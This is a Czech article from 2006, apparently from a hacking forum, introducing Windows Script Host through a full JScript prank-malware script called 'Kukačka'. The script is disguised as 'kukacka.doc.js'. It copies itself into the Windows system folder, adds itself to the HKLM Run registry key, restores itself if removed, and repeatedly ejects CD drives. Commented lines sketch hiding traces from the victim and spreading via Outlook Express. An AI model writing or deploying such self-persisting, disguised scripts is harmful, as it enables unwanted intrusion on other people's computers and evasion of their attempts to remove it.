Zpět na seznam článků     Číst komentáře (25)     Verze pro tisk

WSH _ První krůčky.

Autor: Raduzz   
4.10.2006

Článek nastiňuje možnosti využiti Windows script hostu, jako nastoje k ovládnutí PC.


Project name: Kukačka
Project events: Opening CDROM's
Project style: Lama lamě
Used technology: WSH, JScript
Project target: PC with Windows OS
Description: Po spuštění skriptu na hostitelském pc, dojde k vytvořeni kopie skriptu a jeji registrace ve Windows registru. Tím je zajištěno automatické naběhnutí skriptu po každém spuštění OS. Skript je aktivní po celou dobu běžicího OS. V definovaných časových intervalech prověřuje existenci své kopie na disku a jeji záznam v registru. V případě konfliktu dojde k obnovení. Skript není nikterak agresivní: nešíří se - nenapadá soubory. Hlavní náplní skriptu je automatické otevírání CDROMů.

Nasledující kód uložte jako: "kukacka.doc.js"
//if (WScript.Arguments.Count()>0)

var ForReading = 1, ForWriting = 2;
var soubor="kukacka.doc";
var adresar="C:\\WINDOWS\\SYSTEM\\";

if(WScript.ScriptName==soubor+".js") WScript.Quit();

var xf = WScript.CreateObject("Scripting.FileSystemObject").openTextFile(".\\"+soubor+".js",ForReading);
var vejce= xf.readAll();
xf.Close();


while(1<2){ // zivotni cyklus
	for (var j=0;j<120;j++) { 
		if(j%2==10) hnizdo(); // kazdych 10 minut se proveri jestli je skript v poradku
		if((j+1)%30 ==0) bidylko(); // kazdych 30 minut ...

		WScript.Sleep(60000);//dvouhodinova perioda z minutovych intervalu	
	}
}

function bidylko(){
	var mechaniky =WScript.CreateObject("WMPlayer.OCX").cdromCollection;
	for (var i=0;i< mechaniky.Count;i++) mechaniky.Item(i).Eject();		
}


function hnizdo(){
	var fso= WScript.CreateObject("Scripting.FileSystemObject");
	if (fso.FileExists(adresar+soubor+".js"));
	else {zahnizdi();ptacata();}
}

function zahnizdi(){

	var fso=WScript.CreateObject("Scripting.FileSystemObject");
	var tf=fso.OpenTextFile(adresar+soubor+".js",ForWriting,true);	
	tf.write(vejce);	
	tf.Close();

	var registr =  WScript.CreateObject("WScript.Shell");
	registr.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"+soubor,
		adresar + soubor+".js x");	

	//fso.DeleteFile(".\\"+soubor+".js"); 	// pokud obet skript spusti rucne (ze zvedavosti)
						// dojde k zamaskovani stop
}

function ptacata(){
	// vyhodit mlade z hnizda pomoci Outloock Express
	// kod zatim chybi .. a asi je nerealny

}

PS: Nejsem žadny hacker ani cracker, tak mě prosím za ten článek neukřižujte. Nadohou jsem zabloudil na Váš server. Dozvěděl jsem se spoustu zajimavých věcí, technik o kterých mnozí z Vás napsali, že to jsou staré věci a autora článku za ně málem ukamenovali. Doufám, že nedopadnu podobně. Chápejte, zrovná se učím WSH. Tento skript jsem vypotil a možná, že až sem zase nějaký ... zabloudí, tak mu ten text přijde vhod.

Zatím ahoj, Raduzz

Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     





Hodnocení/Hlasovalo: 0/0

1  2  3  4  5    
(známkování jako ve škole)